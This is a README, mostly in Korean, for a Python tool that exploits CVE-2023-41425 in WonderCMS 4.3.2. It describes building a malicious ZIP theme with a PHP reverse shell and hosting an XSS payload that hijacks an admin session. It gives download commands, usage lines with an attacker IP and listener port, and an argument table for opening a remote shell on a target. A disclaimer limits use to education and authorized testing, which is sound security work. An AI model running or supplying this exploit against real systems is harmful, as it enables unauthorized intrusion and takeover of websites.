
Automates creation and hosting of a JavaScript XSS payload to install a malicious theme module, triggering a reverse shell via Remote Code Execution in WonderCMS. This tool uses PentestMonkey's PHP reverse shell script as the payload JavaScript XSS 페이로드의 생성 및 호스팅을 자동화하여 WonderCMS에서 악성 테마 모듈을 설치하고, 원격 코드 실행을 통해 리버스 셸을 트리거합니다. 이 도구는 페이로드로 PentestMonkey의 PHP 리버스 셸 스크립트를 사용합니다.
이 Python 기반 공격 보안 도구는 WonderCMS 4.3.2의 원격 코드 실행(RCE) 취약점(CVE-2023-41425)을 자동으로 익스플로잇합니다. 악성 ZIP 테마 모듈을 제작하고 JavaScript 기반 XSS 페이로드를 전달하여 관리자 세션을 탈취하고 PHP 리버스 셸을 배포하는 과정을 간소화합니다.
⚠️ 교육 및 승인된 보안 테스트 목적으로만 사용하세요.
이 스크립트는 Python 표준 라이브러리만 사용합니다. 외부 패키지가 필요하지 않습니다.
wget https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2/archive/refs/heads/main.zip
unzip main.zip
cd CVE-2023-41425-RCE-WonderCMS-4.3.2-main
git clone https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2.git
cd ./CVE-2023-41425-RCE-WonderCMS-4.3.2
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r reverseShell.php
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r ./reverseShell.php
스크립트가 내부적으로 수행하는 작업을 설명합니다:
인수 파싱:
argparse를 사용하여 공격자로부터 필수 및 선택적 입력을 수집합니다.리버스 셸 준비:
$ip 및 $port 플레이스홀더를 입력받은 -H 및 -p 값으로 대체합니다.악성 ZIP 생성:
<dir_name>/<php_reverse_shell.php> 형태의 디렉토리 구조를 생성합니다.<zip_name>.zip으로 압축합니다.XSS 페이로드 (script.js) 생성:
지침 및 익스플로잇 호스팅:
nc 리스너 명령어를 출력합니다.이 도구는 MIT 라이선스에 따라 제공됩니다.
🔥 by TeaOnHack🧋 로 제작되었습니다.
이 프로젝트는 교육 및 승인된 보안 평가 목적으로만 사용됩니다. 저자는 이 도구의 오용이나 손해에 대해 책임을 지지 않습니다.
| 인수 | 필수 | 설명 | 기본값 |
|---|
-u | ✅ | 대상 WonderCMS 로그인 URL (예: http://target/index.php?...) | — |
-H, --host | ✅ | 공격자 IP 주소 (리버스 셸용) | — |
-p | ✅ | 공격자 리스닝 포트 | — |
-r, --reverse-shell | ✅ | PHP 리버스 셸 스크립트 경로 | — |
--dir-name | ❌ | ZIP 테마 아카이브 내 디렉토리명 | TeaOn |
--http-port | ❌ | 로컬 HTTP 서버 포트 | 3000 |
--zip-name | ❌ | 생성할 ZIP 파일명 | reverse-shell |